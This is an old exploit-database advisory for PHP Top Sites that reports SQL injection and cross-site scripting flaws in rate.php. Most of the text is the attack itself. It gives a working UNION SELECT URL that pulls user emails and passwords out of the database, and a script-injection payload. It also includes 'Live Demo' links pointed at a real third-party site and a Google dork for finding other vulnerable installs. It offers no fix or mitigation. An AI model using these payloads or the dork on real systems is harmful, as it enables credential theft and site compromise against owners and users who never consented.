PHP Top Sites Cross Site Scripting / SQL Injection

2010-12-13T00:00:00
ID PACKETSTORM:96671
Type packetstorm
Reporter kAsvee
Modified 2010-12-13T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
PHP Top Sites Multiple SQL/XSS Vulnerability   
#############################################################  
  
# Author : kAsvææ | c0de Hunters  
  
# Name : PHP Top Sites  
  
# Bug Type : SQL/XSS  
  
# Version :All  
  
# Google Dork:"Powered By PHP TopSites"  
  
# Home Page : http://itop10.net/  
  
# You can download it : http://webscripts.softpedia.com/script/Top-Sites/PHP-TopSites-41994.html  
  
  
  
#############################################################  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
SQL : "rate.php" (String SQL Injection)  
  
[EXPLOIT] : rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x  
  
  
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x  
  
  
XSS : "rate.php"  
  
[EXPLOIT] : rate.php?site="'><script>alert('xss')</script>  
  
[Live Demo] : http://www.topfunsites.com/topsites/rate.php?site=%22%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E  
  
  
< -- bug code end of -- >   
`